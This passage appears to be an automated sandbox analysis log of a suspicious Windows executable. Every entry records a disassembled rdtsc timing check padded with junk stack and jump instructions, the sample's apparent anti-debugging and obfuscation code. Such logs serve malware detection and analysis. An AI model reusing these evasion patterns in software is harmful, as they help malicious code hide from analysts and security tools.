Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB6754 second address: FB67D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add cl, FFFFFFB1h 0x0000000e mov ebx, dword ptr [ebp+124817E2h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F646CD14778h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D33C8h] 0x00000034 add eax, ebx 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F646CD14778h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 nop 0x00000051 jnl 00007F646CD14784h 0x00000057 push eax 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b ja 00007F646CD14776h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1001A70 second address: 1001A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100464C second address: 100465C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100465C second address: 1004666 instructions: 0x00000000 rdtsc 0x00000002 js 00007F646C53F7AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1004666 second address: 1004679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1004679 second address: 100467F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1004968 second address: 100498C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F646CD14776h 0x00000009 jmp 00007F646CD14782h 0x0000000e pop esi 0x0000000f jc 00007F646CD14782h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100498C second address: 1004992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1008ACE second address: 1008AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F646CD1477Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1008AE6 second address: 1008AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1008AEE second address: 1008AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1007D3A second address: 1007D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1008631 second address: 1008646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14781h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1008646 second address: 100864A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100864A second address: 1008650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10116A8 second address: 10116AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10116AC second address: 10116E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F646CD14787h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F646CD14776h 0x00000019 popad 0x0000001a jne 00007F646CD1477Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100FB22 second address: 100FB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101000B second address: 1010016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F646CD14776h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10108B4 second address: 10108C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F646C53F7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10108C3 second address: 10108EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F646CD14776h 0x0000000a jmp 00007F646CD14788h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10113AE second address: 10113B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1018F59 second address: 1018F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14786h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10194EA second address: 10194F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10194F0 second address: 1019551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14783h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F646CD14776h 0x00000011 jmp 00007F646CD14788h 0x00000016 jp 00007F646CD14776h 0x0000001c jo 00007F646CD14776h 0x00000022 popad 0x00000023 ja 00007F646CD14792h 0x00000029 jbe 00007F646CD1477Eh 0x0000002f pushad 0x00000030 jns 00007F646CD14776h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101F91C second address: 101F92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F646C53F7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101F92D second address: 101F946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F646CD14776h 0x0000000d jmp 00007F646CD1477Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101F946 second address: 101F94A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101F94A second address: 101F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 101F955 second address: 101F95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102016A second address: 1020196 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F646CD14776h 0x00000008 jmp 00007F646CD14781h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F646CD14781h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1020196 second address: 10201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10201A7 second address: 10201B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102B16F second address: 102B178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102B178 second address: 102B17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102B17E second address: 102B18A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102B18A second address: 102B198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F646CD14776h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102CBAD second address: 102CBB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102EFB7 second address: 102EFC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 102EFC0 second address: 102EFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1039A2D second address: 1039A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1039A31 second address: 1039A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103CCB8 second address: 103CCCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F646CD1477Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103E760 second address: 103E771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103E771 second address: 103E77D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103E77D second address: 103E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103E781 second address: 103E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 103E8DC second address: 103E8E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10471A8 second address: 10471AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10471AC second address: 10471B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F646C53F7A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10471B8 second address: 10471E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14786h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F646CD14794h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F646CD14776h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10471E2 second address: 10471E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 104F06E second address: 104F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 104F080 second address: 104F098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F646C53F7B3h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1050F17 second address: 1050F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14781h 0x00000009 pop eax 0x0000000a jbe 00007F646CD1477Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F646CD14776h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F646CD1477Ah 0x0000001f jng 00007F646CD14787h 0x00000025 jmp 00007F646CD14781h 0x0000002a push eax 0x0000002b push edx 0x0000002c ja 00007F646CD14776h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1050F66 second address: 1050F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1050DDE second address: 1050DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1050DE8 second address: 1050DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1050DEC second address: 1050DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 10584BF second address: 1058522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7B1h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b jmp 00007F646C53F7B0h 0x00000010 ja 00007F646C53F7A6h 0x00000016 pop ecx 0x00000017 jmp 00007F646C53F7B4h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F646C53F7B8h 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1056E96 second address: 1056EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14789h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105713B second address: 105713F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105713F second address: 1057147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1057147 second address: 105715F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105715F second address: 105718C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F646CD14776h 0x0000000a jp 00007F646CD14776h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F646CD14794h 0x00000019 je 00007F646CD1477Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007F646CD14776h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105743A second address: 105743F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105743F second address: 1057451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F646CD14776h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105759C second address: 10575A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1057812 second address: 105781A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105781A second address: 1057826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F646C53F7A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1057826 second address: 105783E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F646CD1477Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 105C044 second address: 105C051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F646C53F7A6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105C051 second address: 105C062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jc 00007F646CD147BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E2FC second address: 105E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E300 second address: 105E339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F646CD14783h 0x00000013 jmp 00007F646CD1477Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E339 second address: 105E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 106BD32 second address: 106BD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1079698 second address: 107969C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 107969C second address: 10796A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DEF9 second address: 108DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DF03 second address: 108DF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DF07 second address: 108DF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD3D second address: 108CD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F646CD14776h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F646CD14780h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD65 second address: 108CD6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD6B second address: 108CD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD14783h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D00E second address: 108D012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D8E1 second address: 108D8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D8E5 second address: 108D8F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F646C53F7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DA7F second address: 108DAB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 jne 00007F646CD14776h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 je 00007F646CD1477Eh 0x00000017 push eax 0x00000018 jne 00007F646CD14776h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DAB0 second address: 108DAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DAC1 second address: 108DACB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646CD14776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
